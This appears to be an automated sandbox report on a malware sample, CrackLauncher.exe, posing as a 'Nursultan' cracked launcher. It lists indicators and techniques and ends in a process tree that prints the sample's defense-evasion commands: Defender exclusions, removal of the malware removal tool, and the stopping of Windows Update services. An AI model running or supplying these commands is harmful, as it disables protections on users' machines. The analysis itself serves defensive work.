Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 42 IoCs

Web Service

T1102

flow	ioc
34	discord.com
57	discord.com
58	discord.com
112	discord.com
166	discord.com
21	discord.com
75	discord.com
86	discord.com
96	discord.com
120	discord.com
142	discord.com
143	discord.com
150	discord.com
35	discord.com
167	discord.com
199	discord.com
208	discord.com
121	discord.com
113	discord.com
136	discord.com
151	discord.com
22	discord.com
95	discord.com
102	discord.com
103	discord.com
217	discord.com
74	discord.com
176	discord.com
128	discord.com
158	discord.com
175	discord.com
186	discord.com
207	discord.com
46	discord.com
85	discord.com
129	discord.com
135	discord.com
157	discord.com
187	discord.com
200	discord.com
216	discord.com
45	discord.com

Looks up external IP address via web service 21 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
133	ip-api.com
155	ip-api.com
163	ip-api.com
197	ip-api.com
19	ip-api.com
32	ip-api.com
83	ip-api.com
100	ip-api.com
139	ip-api.com
183	ip-api.com
118	ip-api.com
148	ip-api.com
173	ip-api.com
214	ip-api.com
41	ip-api.com
50	ip-api.com
72	ip-api.com
90	ip-api.com
110	ip-api.com
126	ip-api.com
205	ip-api.com

Power Settings 1 TTPs 56 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2076	powercfg.exe
3420	powercfg.exe
3432	powercfg.exe
3648	powercfg.exe
3340	powercfg.exe
4944	powercfg.exe
4912	powercfg.exe
5100	powercfg.exe
4260	powercfg.exe
1276	powercfg.exe
4968	powercfg.exe
4988	powercfg.exe
3900	powercfg.exe
4176	powercfg.exe
4176	powercfg.exe
3148	powercfg.exe
3256	powercfg.exe
2432	powercfg.exe
3068	powercfg.exe
3408	powercfg.exe
3872	powercfg.exe
2144	powercfg.exe
2876	powercfg.exe
3984	powercfg.exe
4724	powercfg.exe
4700	powercfg.exe
1108	powercfg.exe
1228	powercfg.exe
5048	powercfg.exe
5012	powercfg.exe
2884	powercfg.exe
3144	powercfg.exe
5008	powercfg.exe
2384	powercfg.exe
220	powercfg.exe
4300	powercfg.exe
3224	powercfg.exe
2144	powercfg.exe
536	powercfg.exe
4636	powercfg.exe
4988	powercfg.exe
4740	powercfg.exe
740	powercfg.exe
436	powercfg.exe
1592	powercfg.exe
1984	powercfg.exe
1640	powercfg.exe
536	powercfg.exe
740	powercfg.exe
3660	powercfg.exe
2324	powercfg.exe
332	powercfg.exe
4516	powercfg.exe
3604	powercfg.exe
4548	powercfg.exe
2588	powercfg.exe

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 24 IoCs

description	pid	Process	procid_target
PID 4520 set thread context of 3628	4520	Nursultan.exe	111
PID 5092 set thread context of 5024	5092	Nursultan.exe	137
PID 4276 set thread context of 3848	4276	Nursultan.exe	159
PID 4276 set thread context of 3112	4276	Nursultan.exe	192
PID 3832 set thread context of 5008	3832	Nursultan.exe	423
PID 1320 set thread context of 1844	1320	jqvljmboayxs.exe	269
PID 1320 set thread context of 1296	1320	jqvljmboayxs.exe	272
PID 4896 set thread context of 1264	4896	Nursultan.exe	298
PID 4964 set thread context of 1284	4964	Nursultan.exe	376
PID 5076 set thread context of 3292	5076	Nursultan.exe	379
PID 2388 set thread context of 4332	2388	Nursultan.exe	598
PID 3488 set thread context of 5076	3488	Nursultan.exe	688
PID 2136 set thread context of 964	2136	Nursultan.exe	454
PID 2872 set thread context of 1184	2872	Nursultan.exe	895
PID 4272 set thread context of 1640	4272	Nursultan.exe	1040
PID 4208 set thread context of 1068	4208	Nursultan.exe	876
PID 4224 set thread context of 5008	4224	Nursultan.exe	704
PID 1320 set thread context of 3320	1320	Nursultan.exe	1201
PID 804 set thread context of 2876	804	Nursultan.exe	1086
PID 3204 set thread context of 3964	3204	Nursultan.exe	1034
PID 2968 set thread context of 4640	2968	Nursultan.exe	1157
PID 4556 set thread context of 5008	4556	Nursultan.exe	1208
PID 3248 set thread context of 4528	3248	Nursultan.exe	1325
PID 1184 set thread context of 4176	1184	Nursultan.exe	1150

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4812	sc.exe
4740	sc.exe
3420	sc.exe
4960	sc.exe
2876	sc.exe
3832	sc.exe
1592	sc.exe
2384	sc.exe
1880	sc.exe
3948	sc.exe
2852	sc.exe
864	sc.exe
1316	sc.exe
3532	sc.exe
5040	sc.exe
4520	sc.exe
3640	sc.exe
3920	sc.exe
4896	sc.exe
2324	sc.exe
3112	sc.exe
2988	sc.exe
3900	sc.exe
4860	sc.exe
2560	sc.exe
4852	sc.exe
3648	sc.exe
4132	sc.exe
3420	sc.exe
3936	sc.exe
5012	sc.exe
3920	sc.exe
1588	sc.exe
4176	sc.exe
2056	sc.exe
3968	sc.exe
220	sc.exe
5048	sc.exe
2880	sc.exe
4336	sc.exe
1184	sc.exe
5040	sc.exe
2924	sc.exe
536	sc.exe
932	sc.exe
1752	sc.exe
884	sc.exe
3492	sc.exe
1244	sc.exe
2144	sc.exe
3420	sc.exe
5064	sc.exe
1012	sc.exe
3800	sc.exe
3948	sc.exe
4440	sc.exe
4548	sc.exe
2872	sc.exe
4436	sc.exe
2384	sc.exe
4796	sc.exe
964	sc.exe
3768	sc.exe
3292	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 21 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2440	wmic.exe
984	wmic.exe
3960	wmic.exe
4616	wmic.exe
3900	wmic.exe
4968	wmic.exe
3640	wmic.exe
4216	wmic.exe
4436	wmic.exe
1316	wmic.exe
4124	wmic.exe
3616	wmic.exe
2312	wmic.exe
2616	wmic.exe
5012	wmic.exe
4332	wmic.exe
2796	wmic.exe
700	wmic.exe
3188	wmic.exe
2880	wmic.exe
4420	wmic.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe

Runs ping.exe 1 TTPs 20 IoCs

Remote System Discovery

T1018

pid	Process
2876	PING.EXE
536	PING.EXE
4260	PING.EXE
772	PING.EXE
4088	PING.EXE
5008	PING.EXE
1880	PING.EXE
3660	PING.EXE
3652	PING.EXE
1088	PING.EXE
3936	PING.EXE
2588	PING.EXE
2376	PING.EXE
3604	PING.EXE
4064	PING.EXE
4016	PING.EXE
3488	PING.EXE
1108	PING.EXE
4332	PING.EXE
2332	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3492	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4752	powershell.exe
4752	powershell.exe
1484	powershell.exe
1484	powershell.exe
1484	powershell.exe
4796	powershell.exe
4796	powershell.exe
4796	powershell.exe
4440	powershell.exe
4440	powershell.exe
4440	powershell.exe
3940	powershell.exe
3940	powershell.exe
3940	powershell.exe
3460	powershell.exe
3460	powershell.exe
3460	powershell.exe
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
4276	powershell.exe
4276	powershell.exe
4276	powershell.exe
2312	powershell.exe
2312	powershell.exe
2312	powershell.exe
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe
5092	Nursultan.exe
5092	Nursultan.exe
2560	powershell.exe
2560	powershell.exe
2560	powershell.exe
3292	powershell.exe
3292	powershell.exe
3292	powershell.exe
396	powershell.exe
396	powershell.exe
396	powershell.exe
872	powershell.exe
872	powershell.exe
872	powershell.exe
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
2172	powershell.exe
2172	powershell.exe
4244	powershell.exe
4244	powershell.exe
2172	powershell.exe
4244	powershell.exe
884	powershell.exe
884	powershell.exe
884	powershell.exe
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
4124	powershell.exe
4124	powershell.exe
4124	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	4972	Запустить Nursultan.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	3628	MSBuild.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeIncreaseQuotaPrivilege	4440	wmic.exe
Token: SeSecurityPrivilege	4440	wmic.exe
Token: SeTakeOwnershipPrivilege	4440	wmic.exe
Token: SeLoadDriverPrivilege	4440	wmic.exe
Token: SeSystemProfilePrivilege	4440	wmic.exe
Token: SeSystemtimePrivilege	4440	wmic.exe
Token: SeProfSingleProcessPrivilege	4440	wmic.exe
Token: SeIncBasePriorityPrivilege	4440	wmic.exe
Token: SeCreatePagefilePrivilege	4440	wmic.exe
Token: SeBackupPrivilege	4440	wmic.exe
Token: SeRestorePrivilege	4440	wmic.exe
Token: SeShutdownPrivilege	4440	wmic.exe
Token: SeDebugPrivilege	4440	wmic.exe
Token: SeSystemEnvironmentPrivilege	4440	wmic.exe
Token: SeRemoteShutdownPrivilege	4440	wmic.exe
Token: SeUndockPrivilege	4440	wmic.exe
Token: SeManageVolumePrivilege	4440	wmic.exe
Token: 33	4440	wmic.exe
Token: 34	4440	wmic.exe
Token: 35	4440	wmic.exe
Token: 36	4440	wmic.exe
Token: SeIncreaseQuotaPrivilege	4440	wmic.exe
Token: SeSecurityPrivilege	4440	wmic.exe
Token: SeTakeOwnershipPrivilege	4440	wmic.exe
Token: SeLoadDriverPrivilege	4440	wmic.exe
Token: SeSystemProfilePrivilege	4440	wmic.exe
Token: SeSystemtimePrivilege	4440	wmic.exe
Token: SeProfSingleProcessPrivilege	4440	wmic.exe
Token: SeIncBasePriorityPrivilege	4440	wmic.exe
Token: SeCreatePagefilePrivilege	4440	wmic.exe
Token: SeBackupPrivilege	4440	wmic.exe
Token: SeRestorePrivilege	4440	wmic.exe
Token: SeShutdownPrivilege	4440	wmic.exe
Token: SeDebugPrivilege	4440	wmic.exe
Token: SeSystemEnvironmentPrivilege	4440	wmic.exe
Token: SeRemoteShutdownPrivilege	4440	wmic.exe
Token: SeUndockPrivilege	4440	wmic.exe
Token: SeManageVolumePrivilege	4440	wmic.exe
Token: 33	4440	wmic.exe
Token: 34	4440	wmic.exe
Token: 35	4440	wmic.exe
Token: 36	4440	wmic.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeIncreaseQuotaPrivilege	4016	wmic.exe
Token: SeSecurityPrivilege	4016	wmic.exe
Token: SeTakeOwnershipPrivilege	4016	wmic.exe
Token: SeLoadDriverPrivilege	4016	wmic.exe
Token: SeSystemProfilePrivilege	4016	wmic.exe
Token: SeSystemtimePrivilege	4016	wmic.exe
Token: SeProfSingleProcessPrivilege	4016	wmic.exe
Token: SeIncBasePriorityPrivilege	4016	wmic.exe
Token: SeCreatePagefilePrivilege	4016	wmic.exe
Token: SeBackupPrivilege	4016	wmic.exe
Token: SeRestorePrivilege	4016	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3628	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1264 wrote to memory of 4752	1264	CrackLauncher.exe	91
PID 1264 wrote to memory of 4752	1264	CrackLauncher.exe	91
PID 1264 wrote to memory of 4700	1264	CrackLauncher.exe	95
PID 1264 wrote to memory of 4700	1264	CrackLauncher.exe	95
PID 1264 wrote to memory of 1484	1264	CrackLauncher.exe	96
PID 1264 wrote to memory of 1484	1264	CrackLauncher.exe	96
PID 1264 wrote to memory of 4972	1264	CrackLauncher.exe	99
PID 1264 wrote to memory of 4972	1264	CrackLauncher.exe	99
PID 1264 wrote to memory of 4796	1264	CrackLauncher.exe	100
PID 1264 wrote to memory of 4796	1264	CrackLauncher.exe	100
PID 4972 wrote to memory of 2316	4972	Запустить Nursultan.exe	103
PID 4972 wrote to memory of 2316	4972	Запустить Nursultan.exe	103
PID 1264 wrote to memory of 4520	1264	CrackLauncher.exe	102
PID 1264 wrote to memory of 4520	1264	CrackLauncher.exe	102
PID 1264 wrote to memory of 4520	1264	CrackLauncher.exe	102
PID 1264 wrote to memory of 3608	1264	CrackLauncher.exe	105
PID 1264 wrote to memory of 3608	1264	CrackLauncher.exe	105
PID 4972 wrote to memory of 4440	4972	Запустить Nursultan.exe	118
PID 4972 wrote to memory of 4440	4972	Запустить Nursultan.exe	118
PID 4972 wrote to memory of 3940	4972	Запустить Nursultan.exe	108
PID 4972 wrote to memory of 3940	4972	Запустить Nursultan.exe	108
PID 4520 wrote to memory of 3628	4520	Nursultan.exe	111
PID 4520 wrote to memory of 3628	4520	Nursultan.exe	111
PID 4520 wrote to memory of 3628	4520	Nursultan.exe	111
PID 4520 wrote to memory of 3628	4520	Nursultan.exe	111
PID 4520 wrote to memory of 3628	4520	Nursultan.exe	111
PID 4520 wrote to memory of 3628	4520	Nursultan.exe	111
PID 4520 wrote to memory of 3628	4520	Nursultan.exe	111
PID 4520 wrote to memory of 3628	4520	Nursultan.exe	111
PID 4972 wrote to memory of 3460	4972	Запустить Nursultan.exe	112
PID 4972 wrote to memory of 3460	4972	Запустить Nursultan.exe	112
PID 4972 wrote to memory of 5076	4972	Запустить Nursultan.exe	114
PID 4972 wrote to memory of 5076	4972	Запустить Nursultan.exe	114
PID 3608 wrote to memory of 4276	3608	CrackLauncher.exe	157
PID 3608 wrote to memory of 4276	3608	CrackLauncher.exe	157
PID 4972 wrote to memory of 4440	4972	Запустить Nursultan.exe	118
PID 4972 wrote to memory of 4440	4972	Запустить Nursultan.exe	118
PID 3608 wrote to memory of 1840	3608	CrackLauncher.exe	120
PID 3608 wrote to memory of 1840	3608	CrackLauncher.exe	120
PID 3608 wrote to memory of 2312	3608	CrackLauncher.exe	121
PID 3608 wrote to memory of 2312	3608	CrackLauncher.exe	121
PID 4972 wrote to memory of 4016	4972	Запустить Nursultan.exe	123
PID 4972 wrote to memory of 4016	4972	Запустить Nursultan.exe	123
PID 4972 wrote to memory of 3652	4972	Запустить Nursultan.exe	125
PID 4972 wrote to memory of 3652	4972	Запустить Nursultan.exe	125
PID 4972 wrote to memory of 3832	4972	Запустить Nursultan.exe	179
PID 4972 wrote to memory of 3832	4972	Запустить Nursultan.exe	179
PID 3608 wrote to memory of 1640	3608	CrackLauncher.exe	129
PID 3608 wrote to memory of 1640	3608	CrackLauncher.exe	129
PID 3608 wrote to memory of 2172	3608	CrackLauncher.exe	162
PID 3608 wrote to memory of 2172	3608	CrackLauncher.exe	162
PID 4972 wrote to memory of 2616	4972	Запустить Nursultan.exe	131
PID 4972 wrote to memory of 2616	4972	Запустить Nursultan.exe	131
PID 3608 wrote to memory of 5092	3608	CrackLauncher.exe	174
PID 3608 wrote to memory of 5092	3608	CrackLauncher.exe	174
PID 3608 wrote to memory of 5092	3608	CrackLauncher.exe	174
PID 3608 wrote to memory of 4136	3608	CrackLauncher.exe	135
PID 3608 wrote to memory of 4136	3608	CrackLauncher.exe	135
PID 5092 wrote to memory of 4244	5092	Nursultan.exe	160
PID 5092 wrote to memory of 4244	5092	Nursultan.exe	160
PID 5092 wrote to memory of 4244	5092	Nursultan.exe	160
PID 5092 wrote to memory of 5024	5092	Nursultan.exe	137
PID 5092 wrote to memory of 5024	5092	Nursultan.exe	137
PID 5092 wrote to memory of 5024	5092	Nursultan.exe	137

Views/modifies file attributes 1 TTPs 21 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1876	attrib.exe
5048	attrib.exe
3648	attrib.exe
988	attrib.exe
1740	attrib.exe
2968	attrib.exe
4032	attrib.exe
4016	attrib.exe
2144	attrib.exe
2316	attrib.exe
2172	attrib.exe
4124	attrib.exe
2560	attrib.exe
468	attrib.exe
3088	attrib.exe
1852	attrib.exe
4908	attrib.exe
5012	attrib.exe
4132	attrib.exe
4616	attrib.exe
3248	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4752
- C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:4700
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2280
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3292
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5012
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3920
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2988
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    PID:4272
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:3768
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2884
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:3984
- - C:\Windows\system32\powercfg.exe
